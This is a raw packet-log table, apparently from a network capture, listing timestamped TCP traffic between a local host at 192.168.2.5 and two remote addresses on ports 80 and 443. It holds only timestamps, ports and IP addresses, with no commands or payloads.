                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.042010069 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.042759895 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.042887926 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.042922974 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.043174028 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.043926954 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.043994904 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.044063091 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.044212103 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.045243979 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.045341969 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.045403004 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.045691013 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.046233892 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.046355963 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.046417952 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.046417952 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.047384977 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.047461987 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.047486067 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.048212051 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.048557997 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.048631907 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.048691988 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.048845053 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.049680948 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.049813986 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.049850941 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.050097942 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.050820112 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.050940037 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.051014900 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.051992893 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.052089930 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.052237988 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.052340984 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.053108931 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.053251028 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.053383112 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.053821087 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.054258108 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.054388046 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.054460049 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.055417061 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.055519104 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.055587053 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.056597948 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.056663036 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.056700945 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.056885958 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.057727098 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.057842970 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.057893038 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.058845997 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.058846951 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.058950901 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.059051991 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.060029030 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.060123920 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.060137033 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.060369968 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.061177969 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.061299086 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.061357975 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.061703920 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.062433004 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.062542915 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.062652111 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.063479900 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.063565969 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.063710928 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.063777924 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.064636946 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.064754009 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.064790964 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.065130949 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.065782070 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.065918922 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.066076040 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.066948891 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.066999912 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.067056894 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.067092896 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.068042994 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.068145037 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.068156958 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.068202019 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.069145918 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.069235086 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.069336891 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.069392920 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.070359945 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.070487976 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.070555925 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.071146011 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.071165085 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.071512938 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.071634054 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.071636915 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.071639061 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.071691990 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.072666883 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.072776079 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.072981119 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.073817968 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.073915005 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.073966026 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.074019909 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.074960947 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.075087070 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.075148106 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.076132059 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.076273918 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.076416016 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.077276945 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.077394962 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.077490091 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.078408957 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.078521013 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.078658104 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.079547882 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.079632044 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.079693079 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.079693079 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.080705881 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.080856085 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.080934048 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.081845999 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.081903934 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.081980944 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.082633972 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.083002090 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.083070993 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.083132982 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.083524942 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.084147930 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.084235907 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.084268093 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.084384918 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.084732056 CET4434983013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.084815979 CET4434983013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.085273981 CET49830443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.085289955 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.085355997 CET49830443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.085388899 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.085398912 CET4434983013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.085402012 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.085436106 CET49830443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.085452080 CET4434983013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.085453987 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.090706110 CET49837443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.090770960 CET4434983713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.090868950 CET49837443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.091336966 CET49837443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.091372013 CET4434983713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.213233948 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.213803053 CET49833443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.213845968 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.214323044 CET49833443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.214330912 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.236641884 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.236713886 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.236773968 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.237813950 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.237965107 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.237987995 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.238306999 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.238388062 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.238411903 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.238466978 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.239459991 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.239583969 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.239650965 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.240611076 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.240681887 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.240704060 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.240778923 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.241749048 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.241827011 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.241861105 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.241919994 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.242903948 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.243005991 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.243160963 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.244050026 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.244153976 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.244241953 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.245239973 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.245327950 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.245349884 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.245394945 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.246366024 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.246448994 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.246558905 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.247490883 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.247648001 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.247649908 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.248405933 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.248646975 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.248703003 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.248754978 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.249118090 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.249887943 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.250041008 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.250051975 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.250307083 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.250965118 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.251168013 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.251249075 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.252126932 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.252191067 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.252197981 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.252269030 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.253292084 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.253362894 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.253396988 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.254009008 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.254404068 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.254535913 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.254609108 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.255568981 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.255656004 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.255676985 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.256042957 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.256719112 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.256788969 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.256808996 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.256858110 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.257857084 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.258011103 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.258021116 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.258420944 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.259021997 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.259123087 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.259682894 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.260150909 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.260226011 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.260262012 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.260420084 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.261296988 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.261388063 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.261420965 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.262465954 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.262522936 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.262564898 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.262698889 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.263611078 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.263703108 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.263710976 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.264064074 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.264791012 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.264936924 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.265044928 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.265903950 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.265995979 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.266109943 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.267081976 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.267180920 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.267188072 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.267256975 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.268212080 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.268337965 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.268383026 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.268774033 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.269378901 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.269437075 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.269484997 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.270564079 CET8049773185.215.113.206192.168.2.5
